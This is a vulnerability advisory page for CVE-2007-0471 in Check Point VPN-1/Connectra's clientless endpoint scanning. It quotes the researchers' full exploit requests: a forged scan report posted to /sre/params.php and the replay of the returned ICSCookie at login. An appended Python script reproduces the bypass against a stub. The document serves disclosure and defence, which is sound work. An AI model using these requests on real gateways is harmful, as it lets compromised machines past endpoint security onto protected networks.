SecurityTracker.com
SecurityTracker
Archives


 
Category:   Application (VPN)  >  FireWall-1/VPN-1
Vendors:   Check Point
Check Point VPN-1 Integrity Clientless Security Lets Users Bypass the Scanning Function
SecurityTracker Alert ID:  1017559
SecurityTracker URL:  http://securitytracker.com/id/1017559
CVE Reference:   CVE-2007-0471   (Links to External Site)
Updated:  May 19 2008
Original Entry Date:  Jan 25 2007
Impact:   Host/resource access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): R55, R55W, R60, R61, R62; ICS version 3.x and prior
Description:   A vulnerability was reported in Check Point VPN-1. A user can bypass the endpoint scanning function.

A user can spoof valid scan results on a client system, allowing that system to connect to the network as if a successful scan had occurred when it has not. Successful authentication is still required to connect to the network, so the flaw defeats the endpoint posture check, not the credential check.

The following versions are affected:

VPN-1 Power/UTM (Pro/Express) NGX R62
VPN-1 Power/UTM (Pro/Express) NGX R61
VPN-1 Power/UTM (Pro/Express) NGX R60
VPN-1 Power/UTM (Pro/Express) NG AI R55W
VPN-1 Power/UTM (Pro/Express) NG AI R55

Check Point Connectra is also affected.

The vulnerability resides in the optional Integrity Clientless Security (ICS) component. The gateway issues its ICSCookie on the strength of a scan report that the client itself submits: a user can post a fabricated "good" report to the '/sre/params.php' page, receive a valid ICSCookie authentication value from the server, and then present that cookie to the login page as proof of a passed endpoint security test, regardless of the real scan results.

The vendor was notified on December 24, 2006.

Roni Bachar and Nir Goldshlager discovered this vulnerability.

Impact:   A user whose system would fail the endpoint scan can bypass it and, with valid credentials, gain access to the network.
Solution:   The vendor has issued hotfixes for VPN-1.

The Check Point advisories are available at:

http://secureknowledge.checkpoint.com/SecureKnowledge/viewSolutionDocument.do?lid=sk32472
http://www.checkpoint.com/downloads/latest/hfa/vpn1_security/index.html

Vendor URL:  secureknowledge.checkpoint.com/SecureKnowledge/viewSolutionDocument.do?lid=sk32472 (Links to External Site)
Cause:   Authentication error
Underlying OS:   Linux (Any), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Mon, 22 Jan 2007 07:37:29 +0200
Subject:  Check Point Connectra End Point security bypass

I. INTRODUCTION

Check Point Connectra is a complete Web Security Gateway that provides SSL VPN access and comprehensive endpoint and integrated intrusion prevention security in a single unified remote access solution. By combining both SSL VPN connectivity and security in one solution, organizations can effectively deploy SSL VPNs safely and securely to a diverse set of remote users while ensuring the confidentiality and integrity of information that is critical to the success of any business.

For more Information please refer to:
http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

One of the major things in Check Point Connectra is comprehensive endpoint security. Before a client connects to the internal network, a test is done on the client to check if there is any security hazard on his computer. If a hazard is detected, the user is prompted with the hazard details and asked to run the test again before getting the ability to log in to the network.

A bypass of this test has been detected by Roni Bachar and Nir Goldshlager. A user with a security hazard or a Trojan can bypass the endpoint security tests and log in to the network with a security hazard on his computer. The bypass is done by sending a "good" report to the /sre/params.php page; after the report is sent, a Set-Cookie will be sent from the server to the client. This cookie can be used to bypass the endpoint security findings.

The bypass was detected on the latest version of Check Point Connectra, R62.

III. EXPLOITATION

The vulnerability can be exploited by the following steps:

Send a POST request as follows:

POST https://serverip/sre/params.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: ICS_Secure
Host: serverip
Content-Length: 251
Cache-Control: no-cache
Cookie: ICS_Test_Cookie=1

Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuMTE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0YWxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L1NyZVNjYW5SZXBvcnQ+Cg==


After sending the request, a Set-Cookie will be received from the Check Point Connectra server:

HTTP/1.1 200 OK
Date: Fri, 15 Dec 2006 17:16:19 GMT
Server: CPWS
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13 Sep 2016 17:16:19 GMT; path=/; secure
Content-Length: 0
Content-Type: text/html

This ICSCookie needs to be entered into the next request:

GET https://serverip/Login/Login?LangCode= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: serverip
Connection: Keep-Alive
Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d


IV. WORKAROUND

Check Point released a patch for this vulnerability.


V. DISCLOSURE TIMELINE

20.12.06  First identification of the flaw
24.12.06  Reporting the flaw to Check Point
27.12.06  Meeting Check Point security staff
22.01.07  Publishing the vulnerability
22.01.07  Check Point released a patch for the vulnerability

VI. CREDITS

The vulnerability was discovered by Roni Bachar and Nir Goldshlager.
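The exchange that SecurityTracker's description and the advisory's Exploitation section walk through, as an added Python example that is not part of the original advisory and not Check Point code. It decodes the advisory's own base64 Report value (which turns out to be a SreScanReport element carrying a single UserInfo child and no findings at all), rebuilds that body byte for byte from its fields, serializes the POST with the advisory's Content-Length of 251, and then runs the two steps against a constructed gateway stub. The stub (VulnerableIcsStub), its method names, the host name and the cookie-minting logic are all assumptions that model only what the capture shows: any well-formed report earns an ICSCookie, and the login page checks nothing but that cookie. The hotfix's actual server-side change is not described on this page.

```python
"""Model of the ICS scan-report exchange from the advisory (added example, not
Check Point code). The gateway stub below reproduces only what the capture
shows: any well-formed SreScanReport earns a long-lived ICSCookie, and the
login page checks nothing but that cookie."""
import base64
import re
import secrets
import xml.etree.ElementTree as ET

# The Report value from the advisory's POST, e-mail line wrapping removed.
ADVISORY_REPORT_B64 = (
    "PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM"
    "TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y"
    "WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L"
    "1NyZVNjYW5SZXBvcnQ+Cg=="
)


def decode_report(report_b64):
    """Decode a posted Report value back into its XML tree."""
    return ET.fromstring(base64.b64decode(report_b64))


def build_clean_report(win_user, profile_dir, version="3.7.116.0"):
    """Build a 'good' SreScanReport that names a user and reports nothing else.
    Whitespace (blank line after the prolog, tab indent, trailing newline)
    mirrors the advisory's decoded body, so it round-trips byte for byte."""
    xml = (
        '<?xml version="1.0"?>\n\n'
        f'<SreScanReport Version="{version}">\n'
        f'\t<UserInfo WinDomain="" WinUser="{win_user}" WinUserCatalog="{profile_dir}"/>\n'
        "</SreScanReport>\n"
    )
    return base64.b64encode(xml.encode()).decode()


def build_report_post(host, report_b64):
    """Serialize the POST as the advisory sends it (body left unencoded)."""
    body = "Report=" + report_b64
    headers = [
        "POST /sre/params.php HTTP/1.1",
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: ICS_Secure",
        f"Host: {host}",
        f"Content-Length: {len(body)}",
        "Cache-Control: no-cache",
        "Cookie: ICS_Test_Cookie=1",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode()


def extract_ics_cookie(response):
    """Pull the ICSCookie value out of the gateway's Set-Cookie header."""
    m = re.search(r"^Set-Cookie:\s*ICSCookie=([0-9a-f]{32})", response, re.M)
    if not m:
        raise ValueError("no ICSCookie issued")
    return m.group(1)


class VulnerableIcsStub:
    """Constructed stand-in for the gateway (an assumption, not vendor code).
    /sre/params.php never asks who produced the report or whether a scan ran;
    the expiry string copies the advisory's capture."""

    def __init__(self):
        self.issued = set()  # cookies this gateway has minted

    def params_php(self, report_b64):
        root = decode_report(report_b64)  # malformed XML raises, no cookie
        if root.tag != "SreScanReport":
            raise ValueError("not a scan report")
        token = secrets.token_hex(16)
        self.issued.add(token)
        return (
            "HTTP/1.1 200 OK\r\nServer: CPWS\r\n"
            f"Set-Cookie: ICSCookie={token}; expires=Tue, 13 Sep 2016 17:16:19 GMT; path=/; secure\r\n"
            "Content-Length: 0\r\n\r\n"
        )

    def login_allowed(self, cookie_header):
        """/Login/Login only asks: does the request carry a cookie we minted?"""
        m = re.search(r"(?:^|;\s*)ICSCookie=([0-9a-f]{32})", cookie_header)
        return bool(m) and m.group(1) in self.issued


def bypass(stub, win_user="roni"):
    """The advisory's two steps: post a fabricated clean report, then present
    the returned cookie to the login page as if a scan had passed."""
    report = build_clean_report(win_user, "C:\\Documents and Settings\\" + win_user)
    token = extract_ics_cookie(stub.params_php(report))
    return token, stub.login_allowed(f"CheckCookieSupport=1; ICSCookie={token}")


if __name__ == "__main__":
    tree = decode_report(ADVISORY_REPORT_B64)
    print("advisory report:", tree.tag, tree.get("Version"), tree.find("UserInfo").attrib)
    print(build_report_post("serverip", ADVISORY_REPORT_B64).decode())
    token, ok = bypass(VulnerableIcsStub())
    print("login allowed with fabricated report:", ok, "ICSCookie:", token)
```

Run it directly to see the decoded report, the reconstructed POST and a successful bypass against the stub. The point a practitioner should take from it is the one the advisory makes implicitly: the ICSCookie is a bearer token minted from a document the client asserts about itself, so whatever the scanner does on the endpoint cannot be relied on by the gateway unless the result is bound to something the client cannot forge. The expiry in the capture is nearly ten years out, so the cookie's lifetime does not bound the exposure either.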




 
 


Copyright 2014, SecurityGlobal.net LLC